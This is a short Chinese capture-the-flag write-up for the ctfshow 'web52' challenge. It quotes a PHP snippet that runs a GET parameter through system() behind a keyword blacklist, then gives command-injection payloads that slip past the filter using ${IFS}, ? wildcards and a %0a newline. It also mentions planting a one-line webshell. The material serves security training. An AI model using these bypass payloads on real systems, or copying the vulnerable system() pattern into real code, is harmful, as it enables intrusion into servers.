ctfshow web入门 web52
信息收集
之前一直好用的<和<>被过滤了,仔细看一看,$没过滤
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}
解题
之前我们就用过$了
细节参考:ctfshow web入门 web45
故技重施
?c=nl${IFS}fla?????%0a
之前我们提到过nl获取到的文本包含php标签,标签里的内容被当做代码执行了。所以要看源代码或者抓包才能看到flag.php的内容
rev命令和fold命令同理
但是这里没有flag,一般情况下都是放根目录的,或者/usr /tmp /var之类的。如果实在找不到,就写一句话木马,用蚁剑连上慢慢找
?c=ls${IFS}/%0a
找到一个flag,先打开看看
?c=nl${IFS}/fla?%0a
flag在 nl /flag,flag被过滤了,用fla?代替,或者用单双引号做间隔
web51 目录 web53